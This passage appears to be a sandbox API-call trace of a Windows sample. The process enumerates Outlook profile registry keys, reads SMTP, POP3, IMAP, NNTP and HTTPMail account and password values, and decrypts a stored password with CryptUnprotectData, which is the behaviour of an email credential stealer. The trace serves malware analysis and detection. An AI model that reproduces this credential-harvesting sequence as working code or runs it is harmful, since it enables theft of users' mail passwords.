0x2 [0253.711] GetProcessHeap () returned 0x740000 [0253.711] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.711] GetProcessHeap () returned 0x740000 [0253.711] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.713] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x1c) returned 0x0 [0253.713] GetProcessHeap () returned 0x740000 [0253.713] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.714] GetProcessHeap () returned 0x740000 [0253.714] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.715] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.715] GetProcessHeap () returned 0x740000 [0253.715] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.715] GetProcessHeap () returned 0x740000 [0253.715] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.716] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.716] GetProcessHeap () returned 0x740000 [0253.717] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.717] GetProcessHeap () returned 0x740000 [0253.717] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.718] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x1a) returned 0x0 [0253.718] GetProcessHeap () returned 0x740000 [0253.718] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.718] GetProcessHeap () returned 0x740000 [0253.719] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.821] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.821] GetProcessHeap () returned 0x740000 [0253.822] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.822] GetProcessHeap () returned 0x740000 [0253.822] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.823] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x1e) returned 0x0 [0253.823] GetProcessHeap () returned 0x740000 [0253.824] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.824] GetProcessHeap () returned 0x740000 [0253.824] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.825] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.825] GetProcessHeap () returned 0x740000 [0253.826] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.826] GetProcessHeap () returned 0x740000 [0253.826] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.827] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.827] GetProcessHeap () returned 0x740000 [0253.827] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.828] GetProcessHeap () returned 0x740000 [0253.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.830] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.830] GetProcessHeap () returned 0x740000 [0253.830] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.830] GetProcessHeap () returned 0x740000 [0253.830] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.832] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.832] GetProcessHeap () returned 0x740000 [0253.833] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.833] GetProcessHeap () returned 0x740000 [0253.833] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.835] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.835] GetProcessHeap () returned 0x740000 [0253.835] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.835] GetProcessHeap () returned 0x740000 [0253.835] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.837] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.837] GetProcessHeap () returned 0x740000 [0253.837] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.837] GetProcessHeap () returned 0x740000 [0253.837] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.839] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.839] GetProcessHeap () returned 0x740000 [0253.839] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.839] GetProcessHeap () returned 0x740000 [0253.839] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.840] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.841] GetProcessHeap () returned 0x740000 [0253.841] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.841] GetProcessHeap () returned 0x740000 [0253.841] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.842] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.842] GetProcessHeap () returned 0x740000 [0253.843] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.843] GetProcessHeap () returned 0x740000 [0253.843] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.948] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 0x2 [0253.948] GetProcessHeap () returned 0x740000 [0253.949] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c6f8 | out: hHeap=0x740000) returned 1 [0253.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.950] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0253.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.952] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0253.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.953] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4 | out: pdwType=0x19f6b0*=0x0, pvData=0x19f6b8, pcbData=0x19f6b4*=0x4) returned 0x2 [0253.953] GetProcessHeap () returned 0x740000 [0253.953] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0253.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.954] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0253.954] GetProcessHeap () returned 0x740000 [0253.955] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0253.955] GetProcessHeap () returned 0x740000 [0253.955] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0253.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.956] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0253.956] GetProcessHeap () returned 0x740000 [0253.956] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0253.956] GetProcessHeap () returned 0x740000 [0253.956] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0253.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.958] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0253.958] GetProcessHeap () returned 0x740000 [0253.958] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0253.958] GetProcessHeap () returned 0x740000 [0253.958] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0253.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.959] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0253.960] GetProcessHeap () returned 0x740000 [0253.960] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.066] GetProcessHeap () returned 0x740000 [0254.066] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.067] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0254.067] GetProcessHeap () returned 0x740000 [0254.067] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.067] GetProcessHeap () returned 0x740000 [0254.067] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.069] SHQueryValueExW (in: hkey=0x21c, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x3, pvData=0x75a488*, pcbData=0x19f6b4*=0x121) returned 0x0 [0254.069] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x76ca0000 [0254.200] CryptUnprotectData (in: pDataIn=0x19f6ac, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x19f6b4 | out: ppszDataDescr=0x0, pDataOut=0x19f6b4) returned 1 [0254.207] GetProcessHeap () returned 0x740000 [0254.207] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x26) returned 0x758658 [0254.207] LocalFree (hMem=0x74da68) returned 0x0 [0254.208] GetProcessHeap () returned 0x740000 [0254.208] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758658 | out: hHeap=0x740000) returned 1 [0254.208] GetProcessHeap () returned 0x740000 [0254.208] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.208] GetProcessHeap () returned 0x740000 [0254.208] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.209] SHQueryValueExW (in: hkey=0x21c, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0254.209] GetProcessHeap () returned 0x740000 [0254.210] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.210] GetProcessHeap () returned 0x740000 [0254.210] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.210] SHQueryValueExW (in: hkey=0x21c, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0254.210] GetProcessHeap () returned 0x740000 [0254.211] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.211] GetProcessHeap () returned 0x740000 [0254.211] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.212] SHQueryValueExW (in: hkey=0x21c, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0254.212] GetProcessHeap () returned 0x740000 [0254.212] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.325] GetProcessHeap () returned 0x740000 [0254.325] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.326] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0x19f6b0, pvData=0x75a488, pcbData=0x19f6b4*=0x208 | out: pdwType=0x19f6b0*=0x0, pvData=0x75a488, pcbData=0x19f6b4*=0x208) returned 0x2 [0254.326] GetProcessHeap () returned 0x740000 [0254.327] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.327] GetProcessHeap () returned 0x740000 [0254.327] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c2e0 | out: hHeap=0x740000) returned 1 [0254.328] GetProcessHeap () returned 0x740000 [0254.328] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75fee0 [0254.328] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.329] wvsprintfW (in: param_1=0x75fee0, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0254.329] GetProcessHeap () returned 0x740000 [0254.329] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc6) returned 0x74e4f8 [0254.329] GetProcessHeap () returned 0x740000 [0254.330] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fee0 | out: hHeap=0x740000) returned 1 [0254.330] GetProcessHeap () returned 0x740000 [0254.330] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5f0 [0254.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.332] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x75b5f0 | out: phkResult=0x75b5f0*=0x22c) returned 0x0 [0254.332] GetProcessHeap () returned 0x740000 [0254.332] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c2e0 [0254.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.333] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x75c2e0, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0254.333] GetProcessHeap () returned 0x740000 [0254.334] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c2e0 | out: hHeap=0x740000) returned 1 [0254.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.335] RegCloseKey (hKey=0x22c) returned 0x0 [0254.335] GetProcessHeap () returned 0x740000 [0254.335] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5f0 | out: hHeap=0x740000) returned 1 [0254.336] GetProcessHeap () returned 0x740000 [0254.336] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74e4f8 | out: hHeap=0x740000) returned 1 [0254.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.338] RegCloseKey (hKey=0x21c) returned 0x0 [0254.338] GetProcessHeap () returned 0x740000 [0254.338] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5c0 | out: hHeap=0x740000) returned 1 [0254.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.340] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x2, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="00000003", pcchName=0x19fb4c) returned 0x0 [0254.340] GetProcessHeap () returned 0x740000 [0254.340] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0254.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.342] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000003", phkResult=0x75b530 | out: phkResult=0x75b530*=0x21c) returned 0x0 [0254.342] GetProcessHeap () returned 0x740000 [0254.342] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c2e0 [0254.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.344] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75c2e0, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x75c2e0, pcbData=0x19f6c0*=0x208) returned 0x2 [0254.344] GetProcessHeap () returned 0x740000 [0254.344] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c2e0 | out: hHeap=0x740000) returned 1 [0254.344] GetProcessHeap () returned 0x740000 [0254.344] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75fee0 [0254.345] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.346] wvsprintfW (in: param_1=0x75fee0, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0254.346] GetProcessHeap () returned 0x740000 [0254.347] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc6) returned 0x74ec48 [0254.347] GetProcessHeap () returned 0x740000 [0254.347] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fee0 | out: hHeap=0x740000) returned 1 [0254.348] GetProcessHeap () returned 0x740000 [0254.348] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b650 [0254.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.349] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x75b650 | out: phkResult=0x75b650*=0x22c) returned 0x0 [0254.350] GetProcessHeap () returned 0x740000 [0254.350] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c2e0 [0254.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.351] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x75c2e0, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0254.351] GetProcessHeap () returned 0x740000 [0254.352] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c2e0 | out: hHeap=0x740000) returned 1 [0254.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.353] RegCloseKey (hKey=0x22c) returned 0x0 [0254.353] GetProcessHeap () returned 0x740000 [0254.353] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b650 | out: hHeap=0x740000) returned 1 [0254.353] GetProcessHeap () returned 0x740000 [0254.354] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ec48 | out: hHeap=0x740000) returned 1 [0254.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.380] RegCloseKey (hKey=0x21c) returned 0x0 [0254.380] GetProcessHeap () returned 0x740000 [0254.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0254.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.381] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x3, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0254.381] GetProcessHeap () returned 0x740000 [0254.382] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.383] RegCloseKey (hKey=0x204) returned 0x0 [0254.384] GetProcessHeap () returned 0x740000 [0254.384] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5e0 | out: hHeap=0x740000) returned 1 [0254.384] GetProcessHeap () returned 0x740000 [0254.384] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0254.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.481] RegCloseKey (hKey=0x210) returned 0x0 [0254.481] GetProcessHeap () returned 0x740000 [0254.481] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0254.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.483] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xa, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0x19fb7c) returned 0x0 [0254.483] GetProcessHeap () returned 0x740000 [0254.483] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5b0 [0254.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.484] RegOpenKeyW (in: hKey=0x218, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x75b5b0 | out: phkResult=0x75b5b0*=0x210) returned 0x0 [0254.484] GetProcessHeap () returned 0x740000 [0254.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.485] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0254.485] GetProcessHeap () returned 0x740000 [0254.486] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.486] GetProcessHeap () returned 0x740000 [0254.486] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0254.487] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.487] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") 